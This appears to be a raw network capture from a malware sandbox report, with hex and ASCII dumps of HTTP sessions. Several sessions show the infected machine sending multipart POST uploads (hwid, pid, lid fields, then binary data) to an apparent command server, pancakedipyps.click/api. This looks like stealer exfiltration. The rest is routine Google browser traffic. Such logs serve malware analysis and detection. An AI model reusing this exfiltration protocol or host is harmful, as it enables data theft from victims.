                                                                                                                                                                                                                                                            2024-12-21 21:19:14 UTC1390INData Raw: 74 48 51 6e 64 6e 53 45 4a 6e 61 30 6c 43 64 32 64 4c 51 32 64 72 54 45 52 53 57 56 42 45 55 58 64 4e 52 46 4a 7a 56 55 5a 53 51 56 64 4a 51 6a 42 70 53 57 6c 42 5a 45 68 34 4f 47 74 4c 52 46 46 7a 53 6b 4e 5a 65 45 70 34 4f 47 5a 4d 56 44 42 30 54 56 52 56 4d 30 39 71 62 7a 5a 4a 65 58 4d 76 55 6b 51 34 4e 46 46 36 55 54 56 50 61 6d 4e 43 51 32 64 76 53 30 52 52 64 30 35 48 5a 7a 68 51 52 32 70 6a 62 45 68 35 56 54 4e 4f 65 6d 4d 7a 54 6e 70 6a 4d 30 35 36 59 7a 4e 4f 65 6d 4d 7a 54 6e 70 6a 4d 30 35 36 59 7a 4e 4f 65 6d 4d 7a 54 6e 70 6a 4d 30 35 36 59 7a 4e 4f 65 6d 4d 7a 54 6e 70 6a 4d 30 35 36 59 7a 4e 4f 65 6d 4d 7a 54 6e 70 6a 4d 30 35 36 59 7a 4e 4f 65 6d 4d 7a 54 69 38 76 51 55 46 43 52 55 6c 42 52 55 46 42 55 55 46 4e 51 6b 6c 6e 51 55 4e 46 55
                                                                                                                                                                                                                                                            Data Ascii: tHQndnSEJna0lCd2dLQ2drTERSWVBEUXdNRFJzVUZSQVdJQjBpSWlBZEh4OGtLRFFzSkNZeEp4OGZMVDB0TVRVM09qbzZJeXMvUkQ4NFF6UTVPamNCQ2dvS0RRd05HZzhQR2pjbEh5VTNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTi8vQUFCRUlBRUFBUUFNQklnQUNFU
                                                                                                                                                                                                                                                            2024-12-21 21:19:14 UTC1002INData Raw: 64 32 31 52 64 47 70 68 57 6c 52 7a 53 6b 68 35 52 55 31 71 51 55 52 75 53 32 6c 30 54 48 49 79 64 6a 5a 6d 63 48 56 76 57 44 41 79 62 56 4a 51 4b 33 52 31 62 6d 5a 78 55 31 41 35 54 54 49 77 4f 45 4a 44 55 57 5a 4b 55 55 52 42 4d 6b 74 6b 4e 55 46 48 4e 57 77 72 4d 47 6b 7a 4e 7a 6c 4a 54 6b 77 77 4f 57 31 52 5a 6b 4e 57 63 47 46 75 56 57 49 31 5a 46 52 30 62 47 46 6c 4d 47 64 68 55 6b 6c 79 63 46 51 77 4d 45 74 7a 64 6c 56 4e 61 57 4e 47 64 48 46 69 62 54 49 31 52 32 52 31 52 46 52 58 64 44 5a 30 5a 44 4e 47 4e 57 4e 52 65 6e 4d 32 62 46 63 32 59 33 55 31 5a 31 64 6a 63 57 4e 5a 57 57 64 42 57 55 49 33 53 30 46 47 53 47 39 43 56 6d 4a 52 54 6d 4d 77 4d 31 5a 4f 55 33 4e 77 4f 56 56 70 61 30 34 7a 59 6a 52 56 55 30 78 73 4e 57 31 71 65 48 52 61 54 32 59
                                                                                                                                                                                                                                                            Data Ascii: d21RdGphWlRzSkh5RU1qQURuS2l0THIydjZmcHVvWDAybVJQK3R1bmZxU1A5TTIwOEJDUWZKUURBMktkNUFHNWwrMGkzNzlJTkwwOW1RZkNWcGFuVWI1ZFR0bGFlMGdhUklycFQwMEtzdlVNaWNGdHFibTI1R2R1RFRXdDZ0ZDNGNWNRenM2bFc2Y3U1Z1djcWNZWWdBWUI3S0FGSG9CVmJRTmMwM1ZOU3NwOVVpa04zYjRVU0xsNW1qeHRaT2Y
                                                                                                                                                                                                                                                            2024-12-21 21:19:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                            78192.168.2.450091172.67.209.202443
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:19:19 UTC282OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=3LOCV6N8Z5RN3PI
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 18144
                                                                                                                                                                                                                                                            Host: pancakedipyps.click
                                                                                                                                                                                                                                                            2024-12-21 21:19:19 UTC15331OUTData Raw: 2d 2d 33 4c 4f 43 56 36 4e 38 5a 35 52 4e 33 50 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 43 42 46 37 41 44 32 31 46 43 39 39 30 44 34 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 33 4c 4f 43 56 36 4e 38 5a 35 52 4e 33 50 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 33 4c 4f 43 56 36 4e 38 5a 35 52 4e 33 50 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 33 4c 4f 43 56 36
                                                                                                                                                                                                                                                            Data Ascii: --3LOCV6N8Z5RN3PIContent-Disposition: form-data; name="hwid"ACBF7AD21FC990D4AC8923850305D13E--3LOCV6N8Z5RN3PIContent-Disposition: form-data; name="pid"2--3LOCV6N8Z5RN3PIContent-Disposition: form-data; name="lid"FATE99--test--3LOCV6
                                                                                                                                                                                                                                                            2024-12-21 21:19:19 UTC2813OUTData Raw: cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f
                                                                                                                                                                                                                                                            Data Ascii: d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wE
                                                                                                                                                                                                                                                            2024-12-21 21:19:20 UTC1134INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:19:20 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=5pe8cof9eia20j7ua9l98enond; expires=Wed, 16 Apr 2025 15:05:59 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JdRwnJLiSw0ByF5N1853kAvJ%2Bw2DL7gJnanuzkWywnCym1l7pH6L%2B73XecFrLElrawidLi7ZhZh2GDWXRyG63WqcbYXpioeNfNp%2B8%2Bj%2BFJzEh5Z30BYWeRGaOmSlXG5NAgkfCx9n"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8f5ae8e49dc4424b-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2140&min_rtt=1633&rtt_var=975&sent=18&recv=23&lost=0&retrans=0&sent_bytes=2849&recv_bytes=19106&delivery_rate=1788120&cwnd=248&unsent_bytes=0&cid=86fdf8a14f587fce&ts=1235&x=0"
                                                                                                                                                                                                                                                            2024-12-21 21:19:20 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                            2024-12-21 21:19:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                            79192.168.2.450094172.67.209.202443
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:19:22 UTC282OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=5VIH8I976Q48RA54
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 8771
                                                                                                                                                                                                                                                            Host: pancakedipyps.click
                                                                                                                                                                                                                                                            2024-12-21 21:19:22 UTC8771OUTData Raw: 2d 2d 35 56 49 48 38 49 39 37 36 51 34 38 52 41 35 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 43 42 46 37 41 44 32 31 46 43 39 39 30 44 34 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 35 56 49 48 38 49 39 37 36 51 34 38 52 41 35 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 35 56 49 48 38 49 39 37 36 51 34 38 52 41 35 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 35 56 49
                                                                                                                                                                                                                                                            Data Ascii: --5VIH8I976Q48RA54Content-Disposition: form-data; name="hwid"ACBF7AD21FC990D4AC8923850305D13E--5VIH8I976Q48RA54Content-Disposition: form-data; name="pid"2--5VIH8I976Q48RA54Content-Disposition: form-data; name="lid"FATE99--test--5VI
                                                                                                                                                                                                                                                            2024-12-21 21:19:23 UTC1134INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:19:22 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=81p5k49pfmplu97300sneadjen; expires=Wed, 16 Apr 2025 15:06:01 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TTeyqRqwJfwG%2BNNbizzHq4Bq0WqcIDYoWq%2F9qnA77cOkS1VS68rxcBz0ZiNaOb%2B9uNVQxC3G1zU1hwb0D%2F1pQScG%2BBQwX5x5qzqSzpGUNrAO6T63Xw8gjUqKo%2FcsEWvcaWBr6F6k"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8f5ae8f4ae7642cf-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1594&min_rtt=1583&rtt_var=615&sent=10&recv=14&lost=0&retrans=0&sent_bytes=2847&recv_bytes=9711&delivery_rate=1747456&cwnd=252&unsent_bytes=0&cid=57651106203e736e&ts=952&x=0"
                                                                                                                                                                                                                                                            2024-12-21 21:19:23 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                            2024-12-21 21:19:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                            80192.168.2.450096172.67.209.202443
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:19:24 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=4SPM7YA09SLTZ
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 20406
                                                                                                                                                                                                                                                            Host: pancakedipyps.click
                                                                                                                                                                                                                                                            2024-12-21 21:19:24 UTC15331OUTData Raw: 2d 2d 34 53 50 4d 37 59 41 30 39 53 4c 54 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 43 42 46 37 41 44 32 31 46 43 39 39 30 44 34 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 34 53 50 4d 37 59 41 30 39 53 4c 54 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 34 53 50 4d 37 59 41 30 39 53 4c 54 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 34 53 50 4d 37 59 41 30 39 53 4c 54
                                                                                                                                                                                                                                                            Data Ascii: --4SPM7YA09SLTZContent-Disposition: form-data; name="hwid"ACBF7AD21FC990D4AC8923850305D13E--4SPM7YA09SLTZContent-Disposition: form-data; name="pid"3--4SPM7YA09SLTZContent-Disposition: form-data; name="lid"FATE99--test--4SPM7YA09SLT
                                                                                                                                                                                                                                                            2024-12-21 21:19:24 UTC5075OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii: lrQMn 64F6(X&7~`aO


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                            81192.168.2.450111142.250.181.132443
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:19:52 UTC607OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                            2024-12-21 21:19:53 UTC1266INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:19:53 GMT
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            Expires: -1
                                                                                                                                                                                                                                                            Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                            Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                            Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce--3GT5ql0-Kd0RePXAUDC5A' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                            Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                            Permissions-Policy: unload=()
                                                                                                                                                                                                                                                            Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                            Server: gws
                                                                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            2024-12-21 21:19:53 UTC124INData Raw: 33 36 36 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 6e 75 6e 61 20 62 61 62 79 20 65 73 73 65 6e 74 69 61 6c 73 20 63 61 72 20 73 65 61 74 20 72 65 63 61 6c 6c 22 2c 22 64 72 6f 6e 65 73 20 6d 69 6c 69 74 61 72 79 20 62 61 73 65 73 22 2c 22 67 65 6e 73 68 69 6e 20 69 6d 70 61 63 74 20 35 2e 33 20 6c 69 76 65 73 74 72 65 61 6d 20 63 6f 64 65 73 22 2c 22 66 69 6e 61 6c 20 6a
                                                                                                                                                                                                                                                            Data Ascii: 366)]}'["",["nuna baby essentials car seat recall","drones military bases","genshin impact 5.3 livestream codes","final j
                                                                                                                                                                                                                                                            2024-12-21 21:19:53 UTC753INData Raw: 65 6f 70 61 72 64 79 20 71 75 65 73 74 69 6f 6e 22 2c 22 6e 79 20 72 61 6e 67 65 72 73 20 74 72 61 64 65 22 2c 22 61 73 74 72 61 6e 69 73 20 6d 69 63 72 6f 67 65 6f 20 73 70 61 63 65 78 20 66 61 6c 63 6f 6e 20 39 20 6c 61 75 6e 63 68 22 2c 22 63 6f 73 74 63 6f 20 66 6f 6f 64 20 63 6f 75 72 74 20 63 6f 6b 65 20 70 72 6f 64 75 63 74 73 22 2c 22 6d 69 6c 69 74 61 72 79 20 68 65 6c 69 63 6f 70 74 65 72 20 63 72 61 73 68 20 63 61 6d 70 20 70 65 6e 64 6c 65 74 6f 6e 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22
                                                                                                                                                                                                                                                            Data Ascii: eopardy question","ny rangers trade","astranis microgeo spacex falcon 9 launch","costco food court coke products","military helicopter crash camp pendleton"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"
                                                                                                                                                                                                                                                            2024-12-21 21:19:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                            82192.168.2.450109142.250.181.132443
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:19:52 UTC510OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                            2024-12-21 21:19:53 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Version: 705503573
                                                                                                                                                                                                                                                            Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                            Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                            Permissions-Policy: unload=()
                                                                                                                                                                                                                                                            Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:19:53 GMT
                                                                                                                                                                                                                                                            Server: gws
                                                                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            2024-12-21 21:19:53 UTC372INData Raw: 32 61 64 32 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65
                                                                                                                                                                                                                                                            Data Ascii: 2ad2)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
